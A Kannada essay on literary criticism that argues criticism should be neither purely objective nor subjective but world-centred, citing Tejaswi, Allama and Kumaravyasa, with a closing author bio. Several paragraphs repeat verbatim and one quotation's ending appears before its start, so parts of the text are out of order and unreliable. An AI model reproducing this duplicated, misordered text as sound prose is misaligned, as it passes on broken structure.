ವಿಮರ್ಶೆ ವಸ್ತುನಿಷ್ಠವಾಗಿರಬೇಕೋ, ವ್ಯಕ್ತಿನಿಷ್ಠವಾಗಿರಬೇಕೋ?

ಕಲಾಕೃತಿಯೆನ್ನುವುದು ಒಂದು ಫಿನಿಶ್ಡ್ ಪ್ರೊಡಕ್ಟ್ ಅಲ್ಲ. ಅದು ಸದಾ ಆಗುತ್ತಲೇ ಇರುವ ಒಂದು ಪ್ರಕ್ರಿಯೆ ಮಾತ್ರ. ಇದು ವಿಮರ್ಶೆಗೂ ಅನ್ವಯಿಸುವ ಮಾತು. ಹಾಗಾಗಿ ವಿಮರ್ಶೆ ವಸ್ತುನಿಷ್ಠವೂ ಅಲ್ಲ; ವ್ಯಕ್ತಿನಿಷ್ಠವೂ ಅಲ್ಲ. ಅದು ಸದಾ ಲೋಕನಿಷ್ಠವಾಗಿರುವುದೇ ಸರಿಯಾದ ಮಾರ್ಗ.

ಈ ಪ್ರಶ್ನೆ ಇನ್ನೊಂದಷ್ಟು ಪ್ರಶ್ನೆಗಳನ್ನು ಜೊತೆಯಲ್ಲಿಯೇ ತರುತ್ತದೆ. ಮೊದಲಿಗೆ ಇಂತಹ ವಿಭಜನೆ ಸಾಧ್ಯವೆ? ವಿಮರ್ಶೆ ವಸ್ತುನಿಷ್ಠವೆನ್ನುವ ಏಕಾಕಿ ನಿಲುವಿನಿಂದ ಸಂಭವಿಸುತ್ತದೆಯೆ? ಹೋಗಲಿ ಕೃತಿಯ ರಚನೆಯೆನ್ನುವುದಾದರೂ ಹಾಗೆ ಏಕಾಕಿ ಸಂಗತಿಯೆ? ಒಂದು ಕೃತಿಯ ಓದು ಸಂಭವಿಸುವುದು ಎಲ್ಲಿ, ಹೇಗೆ? ಒಂದು ಸಿದ್ಧ, ಸ್ವತಂತ್ರ, ಶಾಶ್ವತ ಕೃತಿ ಎಂದು ಕರೆಯಬಹುದಾದ ಪಠ್ಯ ಎಲ್ಲಿಯಾದರೂ ಇರುವುದು ಉಂಟೆ? ಇದೊಂದು ಗಂಭೀರವಾದ ಕಾವ್ಯಮೀಮಾಂಸೆಯ ಚರ್ಚೆಯೂ ಹೌದು.

ಎರಡು ನಿಲುವುಗಳಿವೆ ಎಂದೆನ್ನಿಸುತ್ತದೆ. ಈ ಲೋಕದಲ್ಲಿ ಏನೇ ರಚಿತವಾದರೂ ಅದು ಈಗಾಗಲೇ ಇರುವ ಮೂಲವೊಂದರ ಫೋಟೋ ಕಾಪಿಯೇ ಹೊರತು ಮೂಲವಲ್ಲ. ಮೂಲ ಮತ್ತೊಂದು ಇದೆ. ಅದನ್ನು ಅನುಕರಿಸಿ ರಚಿಸಿರುವ ಈ ಕೃತಿ ಎಷ್ಟರ ಮಟ್ಟಿಗೆ ಅದಕ್ಕೆ ನಿಷ್ಠವಾಗಿದೆ ಎಂದು ಶೋಧಿಸಿ ಮಾಕ್ರ್ಸ್ ಹಾಕುವುದಷ್ಟೆ ಓದುಗನ, ವಿಮರ್ಶಕನ ಕೆಲಸ. ಯಾವುದೇ ಕಾರಣಕ್ಕೂ ನೂರು ಅಂಕ ಕೊಡುವಂತಿಲ್ಲ. ಏಕೆಂದರೆ ಇದು ಮೂಲದ ಶಂಕನಾದಕ್ಕಿಂತ ಕೊಂಚ ಊನ. ಎಲ್ಲವನ್ನೂ ತೀರ್ಮಾನಿಸಿಕೊಂಡು ಕೂತಿರುವ ಆ ಮೂಲಕ್ಕೆ ಅರ್ಪಿಸುವುದಷ್ಟೆ ನಮ್ಮ ಕೆಲಸ. ಭಾರತೀಯ ಕಾವ್ಯಮೀಮಾಂಸೆಯ ಈ ಮೂಲವ್ಯಾಧಿ ವಿಮರ್ಶೆಯನ್ನು ನಿಯಂತ್ರಿಸುತ್ತದೆ. ಅತ್ತ ವಸ್ತುನಿಷ್ಠತೆಯಿಂದಲೂ ಬಿಡಿಸಿ ಇತ್ತ ವ್ಯಕ್ತಿನಿಷ್ಠತೆಯಿಂದಲೂ ಬಿಡಿಸಿ, ಕಾಲದೇಶಗಳಿಂದಲೂ ಮುಕ್ತಗೊಳಿಸಿ ಮೇಲಕ್ಕೆ ಮಕಾ ಮಾಡುವಂತೆ ಮಾಡುತ್ತದೆ.

ಇನ್ನೊಂದು ನಿಲುವಿದೆ. ಕೃತಿಕಾರ, ಕೃತಿ, ಓದುಗ, ಓದುವ ಸನ್ನಿವೇಶ ಸಂದರ್ಭ ಮತ್ತು ಅದರಿಂದುಂಟಾಗುವ ಪರಿಣಾಮ ಇವು ಏಕಾಕಿ ಸಂಗತಿಗಳೂ ಅಲ್ಲ; ಸಿದ್ಧ ಸಂಗತಿಗಳೂ ಅಲ್ಲ. ಎಲ್ಲವೂ ಪರಸ್ಪರ ಸಂಬಂಧದಲ್ಲಿ ಉಂಟಾಗಬೇಕಾದ ಸಂಗತಿಗಳು. ಮೊದಲಿಗೆ ಸಿದ್ಧ ಸ್ವತಂತ್ರ ಕೃತಿ ಎನ್ನುವುದು ಇರಲಾರದು. ಓದು, ವಿಮರ್ಶೆ ಎನ್ನುವುದೊಂದು ಪ್ರಕ್ರಿಯೆ. ಕೃತಿಯೊಂದು ಉಂಟಾಗಲು ಓದುಗ ಮತ್ತು ಓದುವ ಸಂದರ್ಭ ಇವೆರಡರೊಡನೆ ಸಂಬಂಧ ಉಂಟಾಗಲೇಬೇಕು. ಪಠ್ಯ ಉಂಟಾಗುವುದು ಓದುಗನ ತುದಿಯಲ್ಲಿಯೇ ಹೊರತು ಬರೆದವನ ತುದಿಯಲ್ಲಲ್ಲ. ಯಾವ ಕೃತಿಯೂ ಎಂದೂ ಸಿದ್ಧವಾಗಿರುವುದಿಲ್ಲ. ಒಂದು ಸಿದ್ಧ ಕೃತಿಯೆನ್ನುವುದೂ ನಿಜವಲ್ಲ. ಕೃತಿ ಉಂಟಾಗುವುದೇ ಓದಿನಲ್ಲಿ. ಪ್ರತಿಯೊಂದು ಓದೂ ನವ ನವೋನ್ಮೇಶಶಾಲಿನಿಯೇ ಹೌದು. 

ಒಂದು ಸಾಪೇಕ್ಷ ಪಠ್ಯಕ್ಕೆ (ಇದೊಂದು ಕಲ್ಪಿತ ಪಠ್ಯವೇ ಹೊರತು ಅಂತದ್ದೊಂದು ಇರಲು ಸಾಧ್ಯವಿಲ್ಲ!) ಅಸಂಖ್ಯ ಪರಿಣಾಮಪಠ್ಯಗಳಿರುತ್ತವೆ. ಎಷ್ಟು ಓದುಗರೋ ಅಷ್ಟು, ಎಷ್ಟು ಓದುಗಳೋ ಅಷ್ಟು. ಕೃತಿ, ಓದು, ಓದುಗ, ಇತ್ಯಾದಿಗಳೆಲ್ಲ ಕಾಲದೇಶ ಸಂದರ್ಭ ಬಂಧಿಗಳು. ಇದು ಪ್ರಕ್ರಿಯಾ ಮೀಮಾಂಸೆ ಎಂದು ಗುರುತಿಸಲ್ಪಡುವ ಮತ್ತೊಂದು ನಿಲುವು.

ಮಲೆಗಳಲ್ಲಿ ಮದುಮಗಳು ಕೃತಿಯನ್ನು ಒಬ್ಬಳೇ ವ್ಯಕ್ತಿ ಇಪ್ಪತ್ತರ ಹರಯದಲ್ಲಿ ಓದಿದಾಗ ಉಂಟಾಗುವ ಪಠ್ಯ ಮತ್ತು ಅವಳೇ ಐವತ್ತರ ವಯಸ್ಸಿನಲ್ಲಿ ಓದಿದಾಗ ಉಂಟಾಗುವ ಪಠ್ಯ ಒಂದೇ ಆಗಿರಲು ಸಾಧ್ಯವಿಲ್ಲ. ಹಾಗಾದರೆ ಕೃತಿಕಾರನಿಂದ ರಚಿತವಾಗಿರುವ ಪಠ್ಯವನ್ನು ಏನೆಂದು ಕರೆಯಬೇಕು? ಹೆಚ್ಚೆಂದರೆ ಅದನ್ನು ಸಾಪೇಕ್ಷ ಪಠ್ಯವೆನ್ನಬಹುದು. ಓದುಗನಲ್ಲಿ ಉಂಟಾಗುವ ಪಠ್ಯವೇ ಪರಿಣಾಮ ಪಠ್ಯ. ಒಂದು ಸಾಪೇಕ್ಷ ಪಠ್ಯಕ್ಕೆ (ಇದೊಂದು ಕಲ್ಪಿತ ಪಠ್ಯವೇ ಹೊರತು ಅಂತದ್ದೊಂದು ಇರಲು ಸಾಧ್ಯವಿಲ್ಲ!) ಅಸಂಖ್ಯ ಪರಿಣಾಮಪಠ್ಯಗಳಿರುತ್ತವೆ. ಎಷ್ಟು ಓದುಗರೋ ಅಷ್ಟು, ಎಷ್ಟು ಓದುಗಳೋ ಅಷ್ಟು. ಕೃತಿ, ಓದು, ಓದುಗ, ಇತ್ಯಾದಿಗಳೆಲ್ಲ ಕಾಲದೇಶ ಸಂದರ್ಭ ಬಂಧಿಗಳು. ಇದು ಪ್ರಕ್ರಿಯಾ ಮೀಮಾಂಸೆ ಎಂದು ಗುರುತಿಸಲ್ಪಡುವ ಮತ್ತೊಂದು ನಿಲುವು.

ಒಂದರ ಪಾಲಿಗೆ, ಇಲ್ಲಿರುವುದೆಲ್ಲ ಆಗಿ ಇರುವ ತೀರ್ಮಾನವಾಗಿರುವ ಸಂಗತಿಗಳು. ಇನ್ನೊಂದರ ಪಾಲಿಗೆ, ಇಲ್ಲಿ ಎಲ್ಲವೂ ಆಗುತ್ತಲೇ ಇರುವ ಸಂಯೋಜನೆಗಳು. ಏನೇ ಸಂಭವಿಸಿದರೂ ಅದು ಕಾರಣ ಮತ್ತು ಸಂದರ್ಭಗಳ ಸಂಯೋಜನೆಯಿಂದಾದ ಪರಿಣಾಮಗಳೇ ಹೊರತು ಯಾವುದೂ ಸ್ವತಂತ್ರವಾಗಿ ಸಂಭವಿಸಿ ಇರುವುದಿಲ್ಲ. ಕೃತಿಯೂ ಅಷ್ಟೆ, ಓದುಗನೂ ಅಷ್ಟೆ, ವಿಮರ್ಶೆಯೂ ಅಷ್ಟೆ. ವಸ್ತುನಿಷ್ಠ ಎಂದು ಸೂಚಿಸುವ ವಿಮರ್ಶೆ ಕೂಡ ಕೃತಿಯ ಸಂದರ್ಭವನ್ನು ಪರಿಗಣಿಸಬೇಕೆಂದೇ ಸೂಚಿಸುತ್ತದೆ. ಅಂದರೆ ಕೃತಿಯ ವಸ್ತುವಿನ ಕಾಲದೇಶಗಳು ಮತ್ತು ಸಂದರ್ಭ, ಕೃತಿ ರಚನೆಯಾದ ಸಂದರ್ಭ ಇತ್ಯಾದಿಗಳನ್ನು ಮಾತ್ರ ಪರಿಗಣಿಸಲು ಅದು ಒತ್ತಾಯಿಸುತ್ತದೆ. ಆದರೆ ವರ್ತಮಾನದ ಓದಿನ ಸಂದರ್ಭವನ್ನು ಮುಂದಿಟ್ಟುಕೊಳ್ಳುವುದಕ್ಕೆ ಸಮ್ಮತಿ ಸೂಚಿಸುವುದಿಲ್ಲ. ಇದು ಒಂದು ಕೋಳಿಯಲ್ಲಿ ಅರ್ಧ ತಿಂದು ಇನ್ನರ್ಧವನ್ನು ಸಾಕಲು ಉಳಿಸಿಕೊಳ್ಳಿ ಎಂದಂತೆ.

ಭೂಮಿಯನ್ನು ತನ್ನ ಕೋರೆದಾಡೆಗಳಿಂದ ವರಾಹವೊಂದು ಎತ್ತಿ ಹಿಡಿದಿದೆ ಎಂದು ನಂಬಿ ಬರೆಯುವವನು ಪೌರಾಣಿಕ ಅಥವಾ ಧಾರ್ಮಿಕ ಬರಹಗಾರನೆನ್ನಿಸಬಹುದೇನೋ! ಆದರೆ ವಿಶ್ವದ ಶೂನ್ಯದಲ್ಲಿ ಪರಿಭ್ರಮಿಸುತ್ತಿರುವ ಗ್ರಹ ಭೂಮಿ ಎಂದು ನಂಬಿ ಬರೆಯುವವನನ್ನು ಅದೇ ರೀತಿಯಲ್ಲಿ ನೀವು ವೈಜ್ಞಾನಿಕ ಬರಹಗಾರನೆಂದು ವರ್ಗೀಕರಿಸುವುದು ಸರಿಯಲ್ಲ.”

ಒಂದು ತೊಡಕಿದೆ. ಎರಡನೆಯ ನಿಲುವನ್ನು ರೀಡರ್ಸ್ ರೆಸ್ಪಾನ್ಸ್ ಥಿಯರಿ, ಅನೇಕಾಂತವಾದ ಮುಂತಾದ ಪರಿಕಲ್ಪನಾತ್ಮಕ ಪದಗಳಿಂದ ಕರೆದು, ಮೊದಲನೆಯದರ ಜೊತೆಗೆ ಇದೂ ಒಂದು ಎಂದು ಇಡಲಾಗದು. “ ಹಲವಾರು ಬಾರಿ ಇತರರು ನನ್ನನ್ನು ವೈಜ್ಞಾನಿಕ ಬರಹಗಾರನೆಂದು ವಿವರಿಸುವುದನ್ನು ಕೇಳಿದ್ದೇನೆ. ಆದರೆ ಆಗೆಲ್ಲ ನನಗೆ ನಾವೆಲ್ಲ ಇರಬೇಕಾದ್ದೆ ಹೀಗಲ್ಲವೆ ಎಂದೆನಿಸುತ್ತದೆ. ಭೂಮಿಯನ್ನು ತನ್ನ ಕೋರೆದಾಡೆಗಳಿಂದ ವರಾಹವೊಂದು ಎತ್ತಿ ಹಿಡಿದಿದೆ ಎಂದು ನಂಬಿ ಬರೆಯುವವನು ಪೌರಾಣಿಕ ಅಥವಾ ಧಾರ್ಮಿಕ ಬರಹಗಾರನೆನ್ನಿಸಬಹುದೇನೋ! ಆದರೆ ವಿಶ್ವದ ಶೂನ್ಯದಲ್ಲಿ ಪರಿಭ್ರಮಿಸುತ್ತಿರುವ ಗ್ರಹ ಭೂಮಿ ಎಂದು ನಂಬಿ ಬರೆಯುವವನನ್ನು ಅದೇ ರೀತಿಯಲ್ಲಿ ನೀವು ವೈಜ್ಞಾನಿಕ ಬರಹಗಾರನೆಂದು ವರ್ಗೀಕರಿಸುವುದು ಸರಿಯಲ್ಲ.” -ಇದು ತನ್ನನ್ನು ವೈಜ್ಞಾನಿಕ ಬರಹಗಾರನೆಂದು ಗುರುತಿಸುವವರಿಗೆ ಪೂರ್ಣಚಂದ್ರ ತೇಜಸ್ವಿಯವರ ಪ್ರತಿಕ್ರಿಯೆ.

ನಾವು ಇರಬೇಕಾದ್ದು ಹೀಗೇ ಅಲ್ಲವೆ? ಎನ್ನುವಲ್ಲಿ, ಒಂದು ಲೋಕಸಂದರ್ಭವನ್ನು ಎದುರಾಗುವ ಕ್ರಮ, ಲೋಕವನ್ನು ಸರಿಯಾಗಿ ವಿವರಿಸಿಕೊಳ್ಳುವ ಮೂಲಕ ಆಗಬೇಕು ಎನ್ನುವ ನಿಲುವನ್ನು ಮುಂದಿಡುತ್ತದೆ. ಇದರ ಹೊರತಾದ ಜೀವನ ಕ್ರಮಗಳನ್ನು ವರ್ಗೀಕರಿಸಿ ಹೆಸರಿಸಿದ ಮಾತ್ರಕ್ಕೆ ಅವೂ ಸರಿಯಾದ ಜೀವನಕ್ರಮಗಳೇ ಎಂದು ಭಾವಿಸುವುದಾಗಲೀ, ಪ್ರತಿ-ಮೀಮಾಂಸೆಗಳೆಂದು ಗುರುತಿಸುವುದಾಗಲೀ ಸಲ್ಲ. ವಿಮರ್ಶೆ ವಸ್ತುನಿಷ್ಠವಾಗಿರಬೇಕು ಎನ್ನುವ ನಿಲುವಿನ ಪಾಡು ಇದೇ ಆಗಿದೆ.

ಸರಿಯಾಗಿ ಲೋಕವನ್ನು ವಿವರಿಸಿಕೊಂಡ ಮಾತ್ರಕ್ಕೆ ಏನಾಗುತ್ತದೆ? ಈ ಲೋಕ ಎರೆಮಣ್ಣಿನಿಂದಾಗಿದೆಯೋ ಹುಣಿಸೆಹಣ್ಣಿನಿಂದಾಗಿದೆಯೋ ಪರಬ್ರಹ್ಮದಿಂದಾಗಿದೆಯೋ ಎಂದು ತಿಳಿದುಕೊಂಡ ಮಾತ್ರಕ್ಕೆ ನಮ್ಮ ನಡೆ, ಓದು, ಮೀಮಾಂಸೆ, ವಿಮರ್ಶೆ ಸರಿಯಾದ ದಾರಿಗೆ ಬಂದುಬಿಡುತ್ತದೋ? ಎನ್ನುವ ಪ್ರಶ್ನೆಗಳನ್ನೂ ಎತ್ತುತ್ತಾರೆ. ನಾವು ಮತ್ತು ನಮ್ಮ ಸುತ್ತಲಿನ ಪ್ರಪಂಚವನ್ನು ಸರಿಯಾಗಿ ವಿವರಿಸಿಕೊಂಡು ವೈಜ್ಞಾನಿಕವಾಗಿ ಬಾಳುವುದನ್ನು ಉಡಾಫೆಯಿಂದ ನೋಡುತ್ತ ಬರೀ ಪೊಳ್ಳು ಸಂರಚನೆಗಳನ್ನು ಸಾಲುಸಾಲಾಗಿ ಒಟ್ಟಿ ಪ್ರಮಾಣಗಳನ್ನಾಗಿಸಿ ನಮ್ಮನ್ನು ದಿಕ್ಕು ತಪ್ಪಿಸುವುದಕ್ಕೆ ಸಾಧ್ಯವಿರುವುದು ಭಾಷಿಕ ಸಂರಚನೆಗಳಿಗೆ. ಹಾಗಾಗಿ ಯಾವುದೇ ಭಾಷಿಯ ಸಂರಚನೆಯನ್ನು ವಿಶ್ಲೇಷಿಸುವಾಗ, ಅದು ವರ್ತಮಾನದ ಲೋಕಸಂದರ್ಭಕ್ಕೆ ಎಷ್ಟರ ಮಟ್ಟಿಗೆ ಪ್ರಸ್ತುತ ಎಂಬುದನ್ನು ಪಕ್ಕಕ್ಕೆ ಇಟ್ಟು ನೋಡಿ ಎನ್ನುವ ನಿಲುವು ಪರೋಕ್ಷವಾಗಿ ವಿಮರ್ಶೆಯನ್ನು ನಿಯಂತ್ರಿಸಬಯಸುತ್ತದೆ. ಅದರಲ್ಲಿಯೂ ನಾವು ಕಂಡಿಲ್ಲದ್ದನ್ನು, ಅನುಭವಿಸಿದ್ದನ್ನು ಕುರಿತ ಸಂಗ್ರಹ ಇರುವುದು, ಇನ್ನೂ ಸೇರುತ್ತಿರುವುದು ಭಾಷಿಕ ರಚನೆಗಳಲ್ಲಿ. ಈ ಪೊಳ್ಳು ಸಂರಚನೆಗಳು ನಮ್ಮ ಓದಿನ ಸ್ವರೂಪವನ್ನು ನಿರ್ಧರಿಸದಿರಲಿ. ಈ ಪೊಳ್ಳಿನದ್ದು ವಿಶ್ವವ್ಯಾಪಿಯಾದ ಬೃಹತ್ ಜಾಲ. ಅದರ ನಿಯಂತ್ರಣದಿಂದ ಓದುಗಳನ್ನು ಮುಕ್ತವಾಗಿಸುವುದು ಕಠಿಣವಾದರೂ ವಿಮರ್ಶೆ ಅದನ್ನು ತನ್ನ ಜವಾಬ್ದಾರಿಯಾಗಿ ನಿರ್ವಹಿಸಬೇಕು.

ಇದು ಹೊರಗಿನಿಂದ ಆವಾಹಿಸಿಕೊಳ್ಳುವ ಸಂಗತಿಯಲ್ಲ; ಬದಲಿಗೆ ತಾನು ವಿವರಿಸಿಕೊಂಡಿರುವ ಲೋಕವಿವರಣೆಗೆ ಅನುಗುಣವಾಗಿ ಸಹಜವಾಗಿ ಉಂಟಾಗುವ ನಿಲುವು. ನಾವೀಗ ಬದುಕುತ್ತಿರುವ ಆವರಣವನ್ನು ಸಾಮಾನ್ಯ ನಿಸರ್ಗವಿವೇಕ, ತರ್ಕಬದ್ಧ ಮತ್ತು ಪರಸ್ಪರರ ಬದುಕುವ ಸಮಾನ ಹಕ್ಕಿಗೆ ಚ್ಯುತಿ ಬಾರದಂತಹ ನಡವಳಿಕೆ ಮತ್ತು ಅದನ್ನು ಪೂರಯಿಸಿ ಕೊಡುವ ಸಂವಿಧಾನದ ಆಶಯಗಳು ನಿರ್ದೇಶಿಸಬೇಕು ಎನ್ನುವುದು ನಮ್ಮ ಜೀವನ ಕ್ರಮದ ನಿರ್ಣಯಾತ್ಮಕ ಅಂಶ.

ವಿಮರ್ಶೆಯ ಮೊದಲ ಹೆಜ್ಜೆಯೆಂದರೆ ಇಂತಹ ಪೊಳ್ಳಿನಿಂದ ಮುಕ್ತವಾಗಿ ತಾನೂ ಓದುವುದು ಮತ್ತು ಎಲ್ಲರೂ ಓದುವಂತೆ ಒತ್ತಾಯಿಸುವುದು. ಮುಂದಿನ ಹೆಜ್ಜೆಯೆಂದರೆ ತನ್ನ ಸುತ್ತಲಿನ ನಿಸರ್ಗ ಮತ್ತು ಜೀವಾವರಣಕ್ಕೆ ಕೇಡಾಗದಂತಹ ಓದನ್ನು ಮುಂದಿಡುವುದು. ಇದು ಹೊರಗಿನಿಂದ ಆವಾಹಿಸಿಕೊಳ್ಳುವ ಸಂಗತಿಯಲ್ಲ; ಬದಲಿಗೆ ತಾನು ವಿವರಿಸಿಕೊಂಡಿರುವ ಲೋಕವಿವರಣೆಗೆ ಅನುಗುಣವಾಗಿ ಸಹಜವಾಗಿ ಉಂಟಾಗುವ ನಿಲುವು. ನಾವೀಗ ಬದುಕುತ್ತಿರುವ ಆವರಣವನ್ನು ಸಾಮಾನ್ಯ ನಿಸರ್ಗವಿವೇಕ, ತರ್ಕಬದ್ಧ ಮತ್ತು ಪರಸ್ಪರರ ಬದುಕುವ ಸಮಾನ ಹಕ್ಕಿಗೆ ಚ್ಯುತಿ ಬಾರದಂತಹ ನಡವಳಿಕೆ ಮತ್ತು ಅದನ್ನು ಪೂರಯಿಸಿ ಕೊಡುವ ಸಂವಿಧಾನದ ಆಶಯಗಳು ನಿರ್ದೇಶಿಸಬೇಕು ಎನ್ನುವುದು ನಮ್ಮ ಜೀವನ ಕ್ರಮದ ನಿರ್ಣಯಾತ್ಮಕ ಅಂಶ. ಇದಕ್ಕೆ ಪೂರಕವಾದ ಅಂಶಗಳನ್ನು ಚರಿತ್ರೆ ಪುರಾಣಗಳಿಂದ ಮತ್ತು ವರ್ತಮಾನದ ರಚನೆಗಳಿಂದ ವಿಮರ್ಶೆಯು ಒದಗಿಸಿಕೊಳ್ಳುವುದರಲ್ಲಿ ಲೋಕದ ಹಿತ ಇದೆ. ಇದಕ್ಕೆ ಬದಲಾಗಿ ಸಮಾನ ಬದುಕಿಗೆ ಚ್ಯುತಿ ತರುವ ಸಾಹಿತ್ಯಿಕ, ಸಾಮಾಜಿಕ ಸಂಗತಿಗಳಿಗೆ ವಸಾಹತುಶಾಹಿ ಆಶಯಗಳಿರುತ್ತವೆ ಎಂದು ಸಂಶಯಿಸಬೇಡವೆ? ಅದು ಭೈರಪ್ಪನವರಾಗಲಿ, ಬೇಂದ್ರೆಯವರಾಗಲಿ, ಕುವೆಂಪು ಅಥವಾ ಮತ್ತೆ ಯಾರಾದರೂ ಸರಿಯೆ. ಯಾರೂ ಪ್ರಶ್ನಿಸಲಾಗದ ಪ್ರಮಾಣಗಳಾಗುವುದು ವಿಮರ್ಶೆಯನ್ನೆ ತಿರಸ್ಕರಿಸಿದಂತಾಗುತ್ತದೆ.

ಭಾರತದ ಸಂದರ್ಭದಲ್ಲಿ ಶೂದ್ರ ಸಮೂಹಕ್ಕೆ ಅಕ್ಷರ ಸಿಕ್ಕಿದ್ದು ತೀರಾ ಇತ್ತೀಚೆಗೆ. ಅಕ್ಷರ ಕಲಿಕೆ ನಮ್ಮದೇ ಆದರೂ ಅದನ್ನು ಬಳಸಿ ನಡೆಸಿದ ಓದಿನ ರೀತಿಯಾಗಲೀ, ಪಠ್ಯಗಳಾಗಲೀ ನಮ್ಮವಾಗಲಿಲ್ಲ. ಮತ್ಯಾರದೋ ಹಿತಾಸಕ್ತಿಗನುಸಾರವಾಗಿ ನಿಯಂತ್ರಿತಗೊಂಡ ಓದನ್ನು ಈ ಸಮೂಹ ಈಗಲೂ ನಡೆಸುತ್ತಲೇ ಇದೆ. ಈ ನಿಯಂತ್ರಣಗಳು ಎಲ್ಲೆಲ್ಲಿಯೋ ಇವೆ. ಪುರಾಣದಲ್ಲಿ ಈ ಕೆಲಸವನ್ನು ವಿಷ್ಣು ಮಾಡಿದರೆ ಚರಿತ್ರೆಯಲ್ಲಿ ಚಾಣಕ್ಯನು ಮಾಡಿದ್ದಾನೆ. ವರ್ತಮಾನದಲ್ಲಿ ಈ ಜವಾಬ್ದಾರಿಯನ್ನು ಸದ್ಯಕ್ಕೆ ಇ-ಚಾನಲ್ಲುಗಳು ಮತ್ತು ಅನೇಕ ದಿನಪತ್ರಿಕೆಗಳು ವಹಿಸಿಕೊಂಡಿವೆ!

ಕುಮಾರವ್ಯಾಸ ತನ್ನದು ಕೃಷ್ಣ ಕಥೆ ಎಂದು ಘೋಷಿಸಿದರೂ ಅದರ ಅರ್ಥದ ಸ್ವರೂಪದ ಬಗೆಗೆ ಹೇಳುವ ಈ ಪಟ್ಟಿ ಮತ್ತದೇ ಓದುಗರು, ಸಂದರ್ಭ, ಸಂಸ್ಥೆ, ಸಂದರ್ಭಾಧಾರಿತವಾದ ನೆಲೆಯಲ್ಲಿಯೇ ಹುಟ್ಟುವ ಅರ್ಥಗಳನ್ನು ಮುಂದಿಡುತ್ತದೆ.

ವಿಮರ್ಶೆಯೆನ್ನುವುದು ಕೃತಿಯೊಂದನ್ನು ವರ್ತಮಾನದ ನಡುವಿಗೆ ತಂದು ನಿಲ್ಲಿಸುವ ವೇದಿಕೆ. ನಮ್ಮ ಲೋಕ ಸಂದರ್ಭವನ್ನು ಈ ಕೃತಿ ಏನೆಂದು ವಿವರಿಸಿಕೊಡುತ್ತಿದೆ ಎಂದು ಪ್ರಶ್ನಿಸದೆ ಅದನ್ನು ಅಲಾಯಿದ ಇಟ್ಟು ಓದಲಾಗದು. ಲೋಕ ನಿರಂತರವಾಗಿ ಬದಲಾಗುತ್ತಲೇ ಇರುವುದರಿಂದ, ವಿಮರ್ಶೆಯ ಮಾನದಂಡಗಳೂ ಬದಲಾಗುವುದು ಅನಿವಾರ್ಯ. ಭೂಮಿ ಚಪ್ಪಟೆಯಾಗಿದೆ ಎಂಬ ತಪ್ಪು ತಿಳಿವಳಿಕೆಗೆ ಅನುಗುಣವಾಗಿ ಇದ್ದ ವಿವರಣೆಯು ಭೂಮಿ ಗುಂಡಗಿದೆ ಎಂದು ಗೊತ್ತಾದ ಮೇಲೆ ಬದಲಾಗಲೇಬೇಕಾಗುತ್ತದೆ. ಹಾಗಾಗಿ ವಿಮರ್ಶೆ ಕೂಡ ನಿರಂತರ ಚಲನಶೀಲವಾಗಿರಲೇಬೇಕು. ಕಾಲಕಾಲಕ್ಕೆ ಒದಗಿಬರುವ ಬದುಕಿನ ತಿರುವುಗಳಿಂದ ಅನುಭವಲೋಕದ ವಿಸ್ತರಣೆಗಳು, ಜ್ಞಾನದ ವಿಸ್ತರಣೆಗಳು ಆದ ಹಾಗೆ, ವಿಮರ್ಶಾ ಪರಿಕಲ್ಪನೆಗಳು ವಿಸ್ತರಣೆಯಾಗುತ್ತ ಹೋಗುವುದು ಸರಿಯಾದ ಕ್ರಮ. ವಿಮರ್ಶೆ ಮತ್ತ್ತು ಒಂದು ಸಮೂಹದ ಜೀವನ ವಿಧಾನಗಳಿಗೆ ನೇರವಾದ ಸಂಬಂಧಗಳಿರುತ್ತವೆ.

ಪದವನರ್ಪಿಸಬಹುದಲ್ಲದೆ ಪದಾರ್ಥವನರ್ಪಿಸಬಾರದು ಎಂಬ ಅಲ್ಲಮನ ನಿಲುವು ಅದನ್ನೆ ನುಡಿಯುತ್ತಿದೆ. ಕುಮಾರವ್ಯಾಸನ ‘ಅರಸುಗಳಿಗಿದು ವೀರ ದ್ವಿಜರಿಗೆ ಪರಮವೇದದ ಸಾರ…’ ಎನ್ನುವ ನಿರೂಪಣೆಯನ್ನೂ ಗಮನಿಸಬಹುದು. ಕುಮಾರವ್ಯಾಸ ತನ್ನದು ಕೃಷ್ಣ ಕಥೆ ಎಂದು ಘೋಷಿಸಿದರೂ ಅದರ ಅರ್ಥದ ಸ್ವರೂಪದ ಬಗೆಗೆ ಹೇಳುವ ಈ ಪಟ್ಟಿ ಮತ್ತದೇ ಓದುಗರು, ಸಂದರ್ಭ, ಸಂಸ್ಥೆ, ಸಂದರ್ಭಾಧಾರಿತವಾದ ನೆಲೆಯಲ್ಲಿಯೇ ಹುಟ್ಟುವ ಅರ್ಥಗಳನ್ನು ಮುಂದಿಡುತ್ತದೆ. ಎಲ್ಲಾ ಸಾಹಿತ್ಯ, ಕಲಾ ಕೃತಿಗಳೂ ಅವುಗಳ ಅನುಸಂಧಾನದಲ್ಲಿ ಉಂಟಾಗುತ್ತವೆ. ಕಲಾಕೃತಿಯೆನ್ನುವುದು ಒಂದು ಫಿನಿಶ್ಡ್ ಪ್ರೊಡಕ್ಟ್ ಅಲ್ಲ. ಅದು ಸದಾ ಆಗುತ್ತಲೇ ಇರುವ ಒಂದು ಪ್ರಕ್ರಿಯೆ ಮಾತ್ರ. ಇದು ವಿಮರ್ಶೆಗೂ ಅನ್ವಯಿಸುವ ಮಾತು. ಹಾಗಾಗಿ ವಿಮರ್ಶೆ ವಸ್ತುನಿಷ್ಠವೂ ಅಲ್ಲ; ವ್ಯಕ್ತಿನಿಷ್ಠವೂ ಅಲ್ಲ. ಅದು ಸದಾ ಲೋಕನಿಷ್ಠವಾಗಿರುವುದೇ ಸರಿಯಾದ ಮಾರ್ಗ.

*ಲೇಖಕರು ತುಮಕೂರಿನ ಸರ್ಕಾರಿ ಪ್ರಥಮ ದರ್ಜೆ ಕಾಲೇಜಿನಲ್ಲಿ ಕನ್ನಡ ಪ್ರಾಧ್ಯಾಪಕರು. ನಾಗಾರ್ಜುನ ಮತ್ತು ಅಲ್ಲಮರ ಬಗ್ಗೆ ಕನ್ನಡದಲ್ಲಿ ಅತ್ಯಂತ ಮುಖ್ಯವಾದ ಕೃತಿಗಳನ್ನು ರಚಿಸಿರುವ ಅವರು ಕನ್ನಡ ತತ್ವಪದಗಳ ಪ್ರಕಟಣೆಯ ಯೋಜನೆಯ ರೂವಾರಿಗಳು.

